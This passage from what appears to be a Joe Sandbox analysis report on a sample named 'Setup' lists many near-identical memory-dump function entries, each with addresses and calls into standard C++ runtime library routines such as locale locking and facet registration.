                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF351
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF35B
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF3AC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF3CC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF3D9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF3E6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF3F0
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF441
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF461
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF46E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B014B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B0155
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B01A6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B01C6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B01D3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B0021
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B002B
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B007C
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B009C
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B00A9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B00B6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B00C0
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B0111
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B0131
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B013E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF764
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF76E
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF7BF
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF7DF
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF7EC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF7F9
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF803
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF854
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF874
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF881
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF510
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF51A
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF56B
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF58B
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF598
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF47B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF485
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF4D6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF4F6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF503
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF923
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF92D
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF97E
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF99E
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF9AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF88E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF898
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF8E9
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF909
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF916
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFF8C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFF96
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFFE7
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B0007
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B0014
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFD36
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFD40
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFD91
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFDB1
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFDBE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFDCB
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFDD5
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFE26
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFE46
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFE53
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFC0C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFC16
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFC67
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFC87
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFC94
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFCA1
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFCAB
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFCFC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFD1C
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFD29
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D613F0
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D613FA
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6144B
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6146B
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61478
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61805
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6180F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61860
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61880
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6188D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61770
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6177A
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D617CB
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D617EB
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D617F8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61485
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6148F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D614E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61500
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6150D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D615AF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D615B9
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6160A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6162A
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61637
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6151A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61524
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61575
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61595
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D615A2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CA78
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CA82
